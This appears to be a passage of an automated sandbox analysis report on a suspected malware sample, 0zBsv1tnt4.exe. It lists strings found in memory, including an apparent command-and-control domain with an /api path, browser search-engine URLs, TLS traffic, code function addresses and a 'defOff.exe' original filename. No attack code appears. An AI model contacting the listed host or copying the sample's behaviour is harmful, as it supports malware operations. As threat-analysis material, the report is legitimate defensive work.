Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://channel9.msdn.com/
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
Source: 0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_112.6.dr String found in binary or memory: https://github.com/Thraka
Source: chromecache_112.6.dr String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_112.6.dr String found in binary or memory: https://github.com/adegeo
Source: chromecache_112.6.dr String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_112.6.dr String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_112.6.dr String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_112.6.dr String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_112.6.dr String found in binary or memory: https://github.com/gewarren
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_112.6.dr String found in binary or memory: https://github.com/mairaw
Source: chromecache_112.6.dr String found in binary or memory: https://github.com/nschonni
Source: 0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: chromecache_112.6.dr String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://learn-video.azurefd.net/vod/player
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1643121544.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001462000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014FF000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686505408.0000000001501000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz/
Source: 0zBsv1tnt4.exe, 00000000.00000003.1537563256.000000000150C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz/==
Source: 0zBsv1tnt4.exe, 00000000.00000003.1625297270.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1591109396.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1598062166.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz/Cl
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz/DataA4
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001462000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz/P)
Source: 0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1564938918.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1565469827.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1564296751.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz/aB
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz/api
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz/d
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz/s
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz/tC
Source: 0zBsv1tnt4.exe, 00000000.00000003.1625297270.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1626048164.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz/wK
Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000003.1597724019.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686505408.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1597829853.0000000001501000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz:443/api
Source: 0zBsv1tnt4.exe, 00000000.00000003.1643121544.0000000001501000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz:443/api;WU
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.00000000014EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mindhandru.buzz:443/apiz
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: chromecache_101.6.dr String found in binary or memory: https://schema.org
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
Source: chromecache_101.6.dr String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://www.linkedin.com/cws/share?url=$
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566815903.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49714 version: TLS 1.2

System Summary

Source: 0zBsv1tnt4.exe Static PE information: section name:
Source: 0zBsv1tnt4.exe Static PE information: section name: .rsrc
Source: 0zBsv1tnt4.exe Static PE information: section name: .idata
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009658D5 0_2_009658D5
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0095B1AF 0_2_0095B1AF
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00989280 0_2_00989280
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00973B50 0_2_00973B50
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097D34A 0_2_0097D34A
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00977440 0_2_00977440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00990460 0_2_00990460
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0098C5A0 0_2_0098C5A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00971D00 0_2_00971D00
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00990D20 0_2_00990D20
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0095E687 0_2_0095E687
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00988EA0 0_2_00988EA0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00958600 0_2_00958600
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0095CE45 0_2_0095CE45
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00972E6D 0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00962750 0_2_00962750
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097C09E 0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009888B0 0_2_009888B0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0096C8A0 0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009838D0 0_2_009838D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097A0CA 0_2_0097A0CA
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0096B8F6 0_2_0096B8F6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097C0E6 0_2_0097C0E6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009660E9 0_2_009660E9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0096D003 0_2_0096D003
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0095D83C 0_2_0095D83C
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0095D021 0_2_0095D021
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0095C840 0_2_0095C840
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0098F18B 0_2_0098F18B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097E180 0_2_0097E180
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009739B9 0_2_009739B9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009791AE 0_2_009791AE
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009781CC 0_2_009781CC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009909E0 0_2_009909E0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097C9EB 0_2_0097C9EB
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00B069CC 0_2_00B069CC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00976910 0_2_00976910
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00955901 0_2_00955901
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097C09E 0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0095397B 0_2_0095397B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00956160 0_2_00956160
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0096E960 0_2_0096E960
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00968169 0_2_00968169
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00989A80 0_2_00989A80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00978ABC 0_2_00978ABC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00969AD0 0_2_00969AD0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009742D0 0_2_009742D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0096E220 0_2_0096E220
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0098DA4D 0_2_0098DA4D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00985A4F 0_2_00985A4F
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0098CA40 0_2_0098CA40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00954270 0_2_00954270
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0096EB80 0_2_0096EB80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009573D0 0_2_009573D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009783D8 0_2_009783D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0095F3C0 0_2_0095F3C0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00959310 0_2_00959310
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00968B1B 0_2_00968B1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0095AB40 0_2_0095AB40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00971340 0_2_00971340
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097F377 0_2_0097F377
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00964CA0 0_2_00964CA0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009704C6 0_2_009704C6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0095D4F3 0_2_0095D4F3
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00981CF0 0_2_00981CF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009724E0 0_2_009724E0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00983C10 0_2_00983C10
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0098A440 0_2_0098A440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0096747D 0_2_0096747D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00987DA9 0_2_00987DA9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0098A5D4 0_2_0098A5D4
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00955DC0 0_2_00955DC0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0098CDF0 0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0096051B 0_2_0096051B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00989D30 0_2_00989D30
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097C53C 0_2_0097C53C
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00976D2E 0_2_00976D2E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00961D2B 0_2_00961D2B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097CD5E 0_2_0097CD5E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097CD4C 0_2_0097CD4C
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0098FD70 0_2_0098FD70
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00974560 0_2_00974560
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0096AEB0 0_2_0096AEB0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009746D0 0_2_009746D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009906F0 0_2_009906F0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0096961B 0_2_0096961B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0098FE00 0_2_0098FE00
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0095F60D 0_2_0095F60D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0096E630 0_2_0096E630
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00988650 0_2_00988650
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097FE74 0_2_0097FE74
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0097EE63 0_2_0097EE63
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00970E6C 0_2_00970E6C
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00959780 0_2_00959780
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00975F1B 0_2_00975F1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00979739 0_2_00979739
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00966F52 0_2_00966F52
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00977740 0_2_00977740
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: String function: 00957F60 appears 40 times
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: String function: 00964C90 appears 74 times
Source: 0zBsv1tnt4.exe Binary or memory string: OriginalFilename vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753508017.0000000005F93000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747939925.0000000005F87000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753200505.00000000060AA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741106166.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748641218.0000000005F90000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747377089.0000000005F89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755710718.00000000060CE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742054561.00000000060F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742641403.0000000006055000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740839803.0000000005DEA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742152200.0000000005F89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741014373.000000000602D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747522970.000000000608F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743489115.0000000005F94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741858552.0000000005F88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742744377.0000000005F88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745026931.000000000606F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749386939.00000000060A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740481105.0000000005F91000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746607777.0000000005F8E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756929032.00000000060DB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
